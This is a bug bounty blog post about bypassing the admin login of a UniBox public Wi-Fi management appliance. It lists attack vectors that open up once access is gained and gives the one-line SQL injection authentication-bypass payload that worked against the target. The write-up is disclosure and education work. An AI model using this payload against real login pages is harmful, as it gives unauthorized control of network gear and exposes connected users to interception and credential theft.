Login Bypass and Full Account Takeover: SQL Exploits — Bug bounty

Alright guys,

In my last Account Takeover post, I explained how I leveraged endpoint disclosure through Javascript Files to gain admin access. If you haven’t read it, go ahead and take a look!

Also, I would love to connect with you on LinkedIn, I believe that is the most professional way to stay connected and in touch. If we are not connected, send me a request! www.linkedin.com/in/facufernandez

Among the scope of work of this company that I will call Target, I found an IP address that led me to this login page:

UniBox is an all-in-one appliance designed for managing public Wi-Fi hotspots. It functions as a network access controller/gateway by enforcing splash page, authentication, and session control.

I will share how I was able to bypass the login in a minute. For now, it is important to understand why is it important to protect UniBox — WifiSoft.

Here are five potential attack vectors an attacker might exploit if he gains access to UniBox:

1. Man-in-the-Middle (MitM) Attacks: With access to the WiFi management system, an attacker can potentially intercept, alter, or eavesdrop on the traffic passing between connected users and their intended destinations. This can lead to data theft, session hijacking, or malicious content injection.
2. Spread Malware: The attacker can set up malicious landing pages or captive portals to deliver malware to connected devices. They might also be able to redirect users to phishing sites or other harmful web locations.
3. Denial of Service (DoS) or Distributed Denial of Service (DDoS): An attacker can potentially disrupt the WiFi service, causing outages or degrading the network’s performance, leading to business disruption and loss of trust among users.
4. Credential Harvesting: With the control of the system, an attacker might be able to capture login credentials of users who connect to the WiFi network. This can then be used for further attacks or sold on the dark web.
5. Network Mapping and Lateral Movement: Once inside, the attacker can map the internal network, identify connected devices and systems, and attempt to exploit vulnerabilities in them. This could lead to deeper network penetration and potentially compromising more sensitive systems or data repositories.

HAPPYHACKING:

After doing research on UniBox, and its versions and vulnerabilities, I tried the following SQL Injection:

'or 1=1 limit 1-- -

And just like that I was logged in as an admin.

The password input does not matter, you can type in whatever you want.

Bypassing authentication in a system like UniBox presents a significant security threat, as it grants unauthorized access to a critical network infrastructure component. Such a vulnerability could expose users to a range of malicious activities, including data interception and malware distribution.

In a matter of 10 minutes, I was inside the Web Application.

Thanks for reading. Ask in the comments any question you have, I tend to reply to those fairly quickly.

Lets connect on LinkedIn www.linkedin.com/in/facufernandez